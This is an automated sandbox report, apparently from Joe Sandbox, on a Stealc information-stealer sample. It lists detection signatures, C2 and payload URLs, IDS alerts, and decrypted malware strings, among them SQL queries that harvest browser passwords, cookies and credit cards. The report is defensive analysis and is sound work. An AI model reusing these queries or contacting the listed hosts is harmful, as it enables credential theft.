Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SEejSLAS9f.exe

Overview

General Information

Sample name:SEejSLAS9f.exe
renamed because original name is a hash value
Original sample name:f538d845b52f9d902ee451636d79df4d.exe
Analysis ID:1572886
MD5:f538d845b52f9d902ee451636d79df4d
SHA1:19b2b01778f50ce375ccfa4c33602b5c5665ccaf
SHA256:9a1c659df3f2a04d8982ea66ce8397736c98eda3059ceebc467033ac35e176ed
Tags:exeStealcuser-abuse_ch
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • SEejSLAS9f.exe (PID: 7732 cmdline: "C:\Users\user\Desktop\SEejSLAS9f.exe" MD5: F538D845B52F9D902EE451636D79DF4D)
    • 1D71.tmp.exe (PID: 7860 cmdline: "C:\Users\user\AppData\Local\Temp\1D71.tmp.exe" MD5: 9D773E345DCA0487C5654A92E6340BAA)
      • WerFault.exe (PID: 7420 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7860 -s 1296 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://92.255.57.89/45c616e921a794b8.php", "Botnet": "default"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000001.00000002.2242131092.00000000009ED000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x1598:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000002.4093473645.00000000008DD000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x1598:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000001.00000002.2242147064.0000000000A0C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Click to see the 9 entries
          SourceRuleDescriptionAuthorStrings
          1.3.1D71.tmp.exe.24b0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
            1.3.1D71.tmp.exe.24b0000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
              1.2.1D71.tmp.exe.400000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                1.2.1D71.tmp.exe.2470e67.1.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  1.2.1D71.tmp.exe.2470e67.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    Click to see the 1 entries
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-11T06:57:07.856254+010020442431Malware Command and Control Activity Detected192.168.2.44973292.255.57.8980TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-11T06:57:00.801518+010028032742Potentially Bad Traffic192.168.2.449730172.67.179.207443TCP
                    2024-12-11T06:57:02.574995+010028032742Potentially Bad Traffic192.168.2.449731176.113.115.1980TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: http://92.255.57.89/sAvira URL Cloud: Label: malware
                    Source: http://92.255.57.89/45c616e921a794b8.phpoAvira URL Cloud: Label: malware
                    Source: http://92.255.57.89/45c616e921a794b8.php;Avira URL Cloud: Label: malware
                    Source: http://92.255.57.89/697b92cb4e247842/sqlite3.dllform-data;Avira URL Cloud: Label: malware
                    Source: http://92.255.57.89/697b92cb4e247842/sqlite3.dll~Avira URL Cloud: Label: malware
                    Source: http://92.255.57.89/45c616e921a794b8.php2dPfAvira URL Cloud: Label: malware
                    Source: http://176.113.115.19/ScreenUpdateSync.exeAvira URL Cloud: Label: malware
                    Source: https://post-to-me.com/track_prt.php?sub=0&cc=DEIAvira URL Cloud: Label: malware
                    Source: 00000001.00000003.1742443251.00000000024B0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://92.255.57.89/45c616e921a794b8.php", "Botnet": "default"}
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exeReversingLabs: Detection: 47%
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeReversingLabs: Detection: 47%
                    Source: SEejSLAS9f.exeReversingLabs: Detection: 42%
                    Source: SEejSLAS9f.exeVirustotal: Detection: 38%Perma Link
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeJoe Sandbox ML: detected
                    Source: SEejSLAS9f.exeJoe Sandbox ML: detected
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: INSERT_KEY_HERE
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: 26
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: 12
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: 20
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: 24
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GetProcAddress
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: LoadLibraryA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: lstrcatA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: OpenEventA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: CreateEventA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: CloseHandle
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: Sleep
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GetUserDefaultLangID
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: VirtualAllocExNuma
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: VirtualFree
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GetSystemInfo
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: VirtualAlloc
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: HeapAlloc
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GetComputerNameA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: lstrcpyA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GetProcessHeap
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GetCurrentProcess
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: lstrlenA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: ExitProcess
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GlobalMemoryStatusEx
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GetSystemTime
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: SystemTimeToFileTime
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: advapi32.dll
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: gdi32.dll
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: user32.dll
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: crypt32.dll
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GetUserNameA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: CreateDCA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GetDeviceCaps
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: ReleaseDC
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: CryptStringToBinaryA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: sscanf
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: VMwareVMware
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: HAL9TH
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: JohnDoe
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: DISPLAY
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: %hu/%hu/%hu
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: http://92.255.57.89
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: /45c616e921a794b8.php
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: /697b92cb4e247842/
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: default
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GetEnvironmentVariableA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GetFileAttributesA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: HeapFree
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GetFileSize
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GlobalSize
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: CreateToolhelp32Snapshot
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: IsWow64Process
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: Process32Next
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GetLocalTime
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: FreeLibrary
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GetTimeZoneInformation
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GetSystemPowerStatus
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GetVolumeInformationA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GetWindowsDirectoryA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: Process32First
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GetLocaleInfoA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GetUserDefaultLocaleName
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GetModuleFileNameA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: DeleteFileA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: FindNextFileA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: LocalFree
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: FindClose
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: SetEnvironmentVariableA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: LocalAlloc
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GetFileSizeEx
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: ReadFile
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: SetFilePointer
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: WriteFile
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: CreateFileA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: FindFirstFileA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: CopyFileA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: VirtualProtect
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GetLogicalProcessorInformationEx
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GetLastError
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: lstrcpynA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: MultiByteToWideChar
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GlobalFree
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: WideCharToMultiByte
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GlobalAlloc
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: OpenProcess
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: TerminateProcess
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GetCurrentProcessId
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: gdiplus.dll
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: ole32.dll
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: bcrypt.dll
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: wininet.dll
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: shlwapi.dll
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: shell32.dll
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: rstrtmgr.dll
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: CreateCompatibleBitmap
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: SelectObject
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: BitBlt
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: DeleteObject
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: CreateCompatibleDC
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GdipGetImageEncodersSize
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GdipGetImageEncoders
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GdiplusStartup
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GdiplusShutdown
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GdipSaveImageToStream
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GdipDisposeImage
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GdipFree
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GetHGlobalFromStream
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: CreateStreamOnHGlobal
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: CoUninitialize
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: CoInitialize
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: CoCreateInstance
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: BCryptGenerateSymmetricKey
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: BCryptCloseAlgorithmProvider
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: BCryptDecrypt
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: BCryptSetProperty
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: BCryptDestroyKey
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: BCryptOpenAlgorithmProvider
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GetWindowRect
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GetDesktopWindow
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GetDC
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: CloseWindow
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: wsprintfA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: EnumDisplayDevicesA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GetKeyboardLayoutList
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: CharToOemW
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: wsprintfW
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: RegQueryValueExA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: RegEnumKeyExA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: RegOpenKeyExA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: RegCloseKey
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: RegEnumValueA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: CryptBinaryToStringA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: CryptUnprotectData
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: SHGetFolderPathA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: ShellExecuteExA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: InternetOpenUrlA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: InternetConnectA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: InternetCloseHandle
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: HttpSendRequestA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: HttpOpenRequestA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: InternetReadFile
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: InternetCrackUrlA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: StrCmpCA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: StrStrA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: StrCmpCW
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: PathMatchSpecA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: GetModuleFileNameExA
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: RmStartSession
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: RmRegisterResources
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: RmGetList
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: RmEndSession
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: sqlite3_open
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: sqlite3_prepare_v2
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: sqlite3_step
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: sqlite3_column_text
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: sqlite3_finalize
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: sqlite3_close
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: sqlite3_column_bytes
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: sqlite3_column_blob
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: encrypted_key
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: PATH
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: C:\ProgramData\nss3.dll
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: NSS_Init
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: NSS_Shutdown
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: PK11_GetInternalKeySlot
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: PK11_FreeSlot
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: PK11_Authenticate
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: PK11SDR_Decrypt
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: C:\ProgramData\
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: browser:
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: profile:
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: url:
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: login:
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: password:
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: Opera
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: OperaGX
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: Network
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: cookies
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: .txt
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: TRUE
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: FALSE
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: autofill
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: history
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: cc
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: name:
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: month:
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: year:
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: card:
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: Cookies
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: Login Data
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: Web Data
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: History
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: logins.json
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: formSubmitURL
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: usernameField
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: encryptedUsername
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: encryptedPassword
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: guid
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: cookies.sqlite
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: formhistory.sqlite
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: places.sqlite
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: plugins
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: Local Extension Settings
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: Sync Extension Settings
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: IndexedDB
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: Opera Stable
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: Opera GX Stable
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: CURRENT
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: chrome-extension_
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: _0.indexeddb.leveldb
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: Local State
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: profiles.ini
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: chrome
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: opera
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: firefox
                    Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpackString decryptor: wallets
